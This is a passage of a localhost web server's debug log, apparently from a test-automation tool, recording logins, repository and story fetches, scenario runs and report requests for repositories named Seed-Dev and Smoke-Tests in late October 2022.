reqOrigin: ::1, resCode: 304 +2022-10-30T17:29:33.061Z debug: [1667150973035, duration: 26] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:29:42.308Z debug: [1667150982304, duration: 4] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:29:42.358Z debug: [1667150982355, duration: 3] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T18:58:38.110Z debug: [1667156318105, duration: 4] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-30T18:58:38.196Z debug: [1667156318193, duration: 3] GET:/api/user/repositories, reqOrigin: ::1, resCode: 500 +2022-10-31T06:03:30.590Z debug: [1667196210507, duration: 82] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T06:03:30.610Z debug: [1667196210607, duration: 2] GET:/api/user/repositories, reqOrigin: ::1, resCode: 500 +2022-10-31T06:03:39.269Z debug: [1667196219188, duration: 80] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T06:03:39.305Z debug: [1667196219297, duration: 7] GET:/repositories, reqOrigin: ::1, resCode: 200 +2022-10-31T06:03:39.352Z debug: [1667196219349, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:03:39.440Z debug: [1667196219435, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:03:39.446Z debug: [1667196219438, duration: 7] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T06:03:39.484Z debug: [1667196219433, duration: 51] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:03:49.468Z debug: [1667196229465, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T06:03:49.490Z debug: [1667196229488, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:15:16.765Z debug: [1667196916744, duration: 20] GET:/reportHistory/6357a1e942797f1390c87c71, reqOrigin: ::1, resCode: 200 +2022-10-31T06:15:27.522Z debug: [1667196924245, duration: 3277] GET:/report/reporting_1666976408261, reqOrigin: ::1, resCode: 200 +2022-10-31T06:17:42.333Z debug: [1667197062330, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:17:42.364Z debug: [1667197062354, duration: 9] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T06:17:42.442Z debug: [1667197062435, duration: 7] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:17:42.444Z debug: [1667197062439, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T06:17:42.478Z debug: [1667197062437, duration: 41] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:17:43.903Z debug: [1667197063900, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:17:43.918Z debug: [1667197063916, duration: 1] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:18:04.720Z debug: [1667197084676, duration: 44] PUT:/6357a1e942797f1390c87c71/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T06:18:10.179Z debug: [1667197090144, duration: 34] PUT:/6357a1e942797f1390c87c71/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T06:24:02.507Z debug: [1667197442422, duration: 84] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T06:24:02.538Z debug: [1667197442527, duration: 9] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T06:24:05.791Z debug: [1667197445788, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:24:05.874Z debug: [1667197445870, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:24:05.877Z debug: [1667197445873, duration: 4] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T06:24:05.907Z debug: [1667197445868, duration: 39] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T06:24:08.931Z debug: [1667197448928, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T06:24:08.951Z debug: [1667197448949, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:28:59.413Z debug: [1667197739410, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:30:00.320Z debug: [1667197800316, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:30:44.824Z debug: [1667197844814, duration: 10] POST:/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:31:25.070Z debug: [1667197885063, duration: 7] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T06:32:00.204Z debug: [1667197920198, duration: 6] POST:/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:32:31.540Z debug: [1667197951534, duration: 5] POST:/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:32:49.766Z debug: [1667197969760, duration: 5] POST:/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:33:07.709Z debug: [1667197987704, duration: 5] PUT:/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T06:35:23.878Z debug: [1667198123867, duration: 11] POST:/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:35:44.757Z debug: [1667198144751, duration: 6] POST:/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:36:02.926Z debug: [1667198162920, duration: 6] POST:/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:41:46.802Z debug: [1667198506795, duration: 7] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T06:42:16.427Z debug: [1667198511539, duration: 24888] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T06:42:16.598Z debug: [1667198536594, duration: 3] GET:/report/635f6e48fa76542960ac1238, reqOrigin: ::1, resCode: 200 +2022-10-31T06:42:51.817Z debug: [1667198571814, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:42:59.394Z debug: [1667198579389, duration: 5] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:43:29.470Z debug: [1667198587347, duration: 22123] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T06:43:29.529Z debug: [1667198609525, duration: 3] GET:/report/635f6e91fa76542960ac123a, reqOrigin: ::1, resCode: 200 +2022-10-31T06:43:51.675Z debug: [1667198631670, duration: 4] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:44:21.308Z debug: [1667198638470, duration: 22837] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T06:44:21.455Z debug: [1667198661450, duration: 5] GET:/report/635f6ec5fa76542960ac123c, reqOrigin: ::1, resCode: 200 +2022-10-31T06:46:50.700Z debug: [1667198787977, duration: 22723] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T06:46:50.872Z debug: [1667198810869, duration: 2] GET:/report/635f6f5afa76542960ac123e, reqOrigin: ::1, resCode: 200 +2022-10-31T06:47:08.449Z debug: [1667198828444, duration: 5] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:47:43.836Z debug: [1667198831970, duration: 31866] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T06:47:43.891Z debug: [1667198863888, duration: 3] GET:/report/635f6f8ffa76542960ac1240, reqOrigin: ::1, resCode: 200 +2022-10-31T06:48:26.778Z debug: [1667198884590, duration: 22188] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T06:48:26.840Z debug: [1667198906837, duration: 2] GET:/report/635f6fbafa76542960ac1242, reqOrigin: ::1, resCode: 200 +2022-10-31T06:48:38.526Z debug: [1667198918521, duration: 4] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:48:45.413Z debug: [1667198925410, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:48:45.504Z debug: [1667198925493, duration: 11] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:48:45.507Z debug: [1667198925501, duration: 6] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T06:48:45.542Z debug: [1667198925532, duration: 9] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:48:45.552Z debug: [1667198925535, duration: 16] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T06:48:45.562Z debug: [1667198925488, duration: 74] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T06:48:45.619Z debug: [1667198925584, duration: 35] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:48:48.182Z debug: [1667198928179, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:48:48.204Z debug: [1667198928202, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:48:50.884Z debug: [1667198930881, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:48:58.500Z debug: [1667198938494, duration: 5] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T06:49:24.855Z debug: [1667198942008, duration: 22847] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T06:49:24.998Z debug: [1667198964996, duration: 2] GET:/report/635f6ff4fa76542960ac1244, reqOrigin: ::1, resCode: 200 +2022-10-31T06:51:09.013Z debug: [1667199069007, duration: 5] PUT:/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T06:51:12.123Z debug: [1667199072117, duration: 5] PUT:/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T06:51:29.487Z debug: [1667199089482, duration: 4] PUT:/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T06:53:42.757Z debug: [1667199222752, duration: 5] PUT:/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T06:53:51.702Z debug: [1667199231697, duration: 5] PUT:/6357a20842797f1390c87c74/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T06:53:55.098Z debug: [1667199235090, duration: 8] PUT:/6357a20842797f1390c87c74/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T06:54:14.624Z debug: [1667199254618, duration: 6] PUT:/6357a20842797f1390c87c74/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T06:54:41.297Z debug: [1667199281213, duration: 84] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T06:54:41.323Z debug: [1667199281315, duration: 8] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T06:54:41.350Z debug: [1667199281345, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:54:41.421Z debug: [1667199281416, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:54:41.423Z debug: [1667199281419, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T06:54:41.474Z debug: [1667199281417, duration: 57] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T06:54:43.749Z debug: [1667199283746, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:54:43.765Z debug: [1667199283763, duration: 1] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T06:54:59.508Z debug: [1667199299502, duration: 6] PUT:/6357a20842797f1390c87c74/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T06:57:14.392Z debug: [1667199434387, duration: 5] PUT:/6357a20842797f1390c87c74/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T06:57:41.212Z debug: [1667199461204, duration: 7] PUT:/6357a20842797f1390c87c74/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T06:58:21.500Z debug: [1667199501482, duration: 17] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T07:03:52.987Z debug: [1667199832916, duration: 70] GET:/reportHistory/6357a1e942797f1390c87c71, reqOrigin: ::1, resCode: 200 +2022-10-31T07:04:01.597Z debug: [1667199835800, duration: 5796] GET:/report/reporting_1667196247190, reqOrigin: ::1, resCode: 200 +2022-10-31T07:05:11.863Z debug: [1667199911779, duration: 84] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T07:05:12.019Z debug: [1667199911991, duration: 11] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T07:05:12.097Z debug: [1667199912092, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:05:12.217Z debug: [1667199912212, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:05:12.233Z debug: [1667199912222, duration: 10] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T07:05:12.266Z debug: [1667199912208, duration: 56] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T07:05:25.734Z debug: [1667199925732, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T07:05:25.847Z debug: [1667199925845, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:05:39.999Z debug: [1667199939992, duration: 7] PUT:/6357a1fc42797f1390c87c73/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T07:14:01.258Z debug: [1667200441246, duration: 11] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 200 +2022-10-31T07:14:07.425Z debug: [1667200447422, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:14:07.444Z debug: [1667200447441, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:16:14.949Z debug: [1667200574946, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:23:43.814Z debug: [1667201023804, duration: 10] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T07:28:30.250Z debug: [1667201310168, duration: 82] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T07:28:30.286Z debug: [1667201310275, duration: 11] GET:/repositories, reqOrigin: ::1, resCode: 200 +2022-10-31T07:28:38.705Z debug: [1667201318702, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T07:28:38.782Z debug: [1667201318770, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:28:38.787Z debug: [1667201318771, duration: 15] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T07:28:38.820Z debug: [1667201318765, duration: 55] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T07:28:41.140Z debug: [1667201321137, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T07:28:41.156Z debug: [1667201321153, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:29:50.432Z debug: [1667201390350, duration: 82] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T07:29:50.461Z debug: [1667201390452, duration: 9] GET:/repositories, reqOrigin: ::1, resCode: 200 +2022-10-31T07:29:52.256Z debug: [1667201392253, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T07:29:52.337Z debug: [1667201392333, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:29:52.340Z debug: [1667201392334, duration: 6] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T07:29:52.371Z debug: [1667201392329, duration: 41] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T07:29:56.359Z debug: [1667201396356, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T07:29:56.377Z debug: [1667201396375, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:30:28.001Z debug: [1667201427998, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:30:28.050Z debug: [1667201428042, duration: 7] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:30:28.070Z debug: [1667201428050, duration: 20] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T07:30:28.079Z debug: [1667201428076, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:30:28.091Z debug: [1667201428039, duration: 51] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T07:30:28.098Z debug: [1667201428091, duration: 7] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T07:30:28.184Z debug: [1667201428134, duration: 48] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:30:29.766Z debug: [1667201429764, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:30:29.782Z debug: [1667201429779, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:30:49.030Z debug: [1667201449021, duration: 8] PUT:/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T07:31:27.633Z debug: [1667201487551, duration: 81] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T07:31:27.661Z debug: [1667201487653, duration: 7] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T07:31:29.846Z debug: [1667201489843, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:31:29.920Z debug: [1667201489916, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:31:29.922Z debug: [1667201489917, duration: 4] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T07:31:29.952Z debug: [1667201489914, duration: 38] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T07:31:31.693Z debug: [1667201491691, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:31:31.711Z debug: [1667201491709, duration: 1] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:33:03.255Z debug: [1667201583246, duration: 9] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T07:33:44.163Z debug: [1667201624156, duration: 6] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T07:35:00.428Z debug: [1667201700420, duration: 7] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T07:35:07.850Z debug: [1667201707842, duration: 8] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T07:36:15.013Z debug: [1667201775007, duration: 6] PUT:/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T07:37:55.980Z debug: [1667201875972, duration: 8] PUT:/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T07:39:36.936Z debug: [1667201976928, duration: 8] PUT:/6357a20842797f1390c87c74/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T07:39:57.168Z debug: [1667201997161, duration: 7] PUT:/6357a20842797f1390c87c74/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T07:40:23.452Z debug: [1667202023371, duration: 80] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T07:40:23.481Z debug: [1667202023474, duration: 7] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T07:40:23.510Z debug: [1667202023505, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:40:23.589Z debug: [1667202023584, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T07:40:23.591Z debug: [1667202023586, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:40:23.622Z debug: [1667202023583, duration: 39] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T07:40:25.392Z debug: [1667202025389, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:40:25.411Z debug: [1667202025409, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T07:41:36.659Z debug: [1667202096650, duration: 8] PUT:/6357a20842797f1390c87c74/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T07:42:41.840Z debug: [1667202161833, duration: 7] PUT:/6357a20842797f1390c87c74/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T07:44:21.084Z debug: [1667202261075, duration: 8] PUT:/6357a20842797f1390c87c74/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T07:45:26.124Z debug: [1667202326115, duration: 8] PUT:/6357a20842797f1390c87c74/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T07:46:41.054Z debug: [1667202401046, duration: 7] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T07:47:15.016Z debug: [1667202435006, duration: 9] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T07:48:32.647Z debug: [1667202512640, duration: 6] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T07:49:22.746Z debug: [1667202562738, duration: 8] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T07:49:39.218Z debug: [1667202579209, duration: 8] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T07:50:13.427Z debug: [1667202613418, duration: 9] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T07:50:26.381Z debug: [1667202626367, duration: 9] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T07:50:42.408Z debug: [1667202642399, duration: 9] PUT:/6357a21542797f1390c87c75/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T07:52:51.601Z debug: [1667202771594, duration: 6] PUT:/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T08:02:55.358Z debug: [1667203375350, duration: 8] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T08:07:36.053Z debug: [1667203656034, duration: 9] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T08:09:27.166Z debug: [1667203767159, duration: 7] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T08:16:26.382Z debug: [1667204186372, duration: 9] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T08:16:33.375Z debug: [1667204193368, duration: 7] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T08:17:56.756Z debug: [1667204276747, duration: 9] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T08:30:04.374Z debug: [1667205004371, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 200 +2022-10-31T08:46:16.369Z debug: [1667205976359, duration: 9] PUT:/6357a21542797f1390c87c75/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T08:51:45.730Z debug: [1667206305719, duration: 11] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T08:54:12.730Z debug: [1667206452720, duration: 9] PUT:/6357a21542797f1390c87c75/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T08:54:43.508Z debug: [1667206483497, duration: 11] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T08:55:16.120Z debug: [1667206489750, duration: 26370] POST:/Scenario/6357a21542797f1390c87c75/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T08:55:16.297Z debug: [1667206516294, duration: 3] GET:/report/635f8d74fa76542960ac129d, reqOrigin: ::1, resCode: 200 +2022-10-31T09:15:30.430Z debug: [1667207730350, duration: 79] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T09:15:30.528Z debug: [1667207730519, duration: 8] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T09:15:30.614Z debug: [1667207730612, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:15:30.763Z debug: [1667207730757, duration: 6] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:15:30.770Z debug: [1667207730767, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:15:30.782Z debug: [1667207730735, duration: 47] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T09:15:35.622Z debug: [1667207735620, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:15:35.714Z debug: [1667207735711, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:18:10.135Z debug: [1667207890125, duration: 9] POST:/6357a1fc42797f1390c87c73/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:18:34.992Z debug: [1667207914985, duration: 7] PUT:/6357a1fc42797f1390c87c73/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T09:18:49.324Z debug: [1667207929319, duration: 5] PUT:/6357a1fc42797f1390c87c73/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T09:19:55.159Z debug: [1667207995151, duration: 7] POST:/6357a1fc42797f1390c87c73/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:20:21.491Z debug: [1667208021471, duration: 9] PUT:/6357a1fc42797f1390c87c73/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T09:20:59.562Z debug: [1667208059554, duration: 8] PUT:/6357a1fc42797f1390c87c73/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T09:21:23.176Z debug: [1667208083167, duration: 9] POST:/6357a1fc42797f1390c87c73/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:22:00.771Z debug: [1667208120762, duration: 8] PUT:/6357a1fc42797f1390c87c73/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T09:22:26.197Z debug: [1667208146187, duration: 9] POST:/6357a1fc42797f1390c87c73/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:22:31.067Z debug: [1667208150985, duration: 81] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T09:22:31.108Z debug: [1667208151101, duration: 7] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:31.147Z debug: [1667208151145, duration: 2] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:31.215Z debug: [1667208151209, duration: 5] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:31.216Z debug: [1667208151213, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:31.226Z 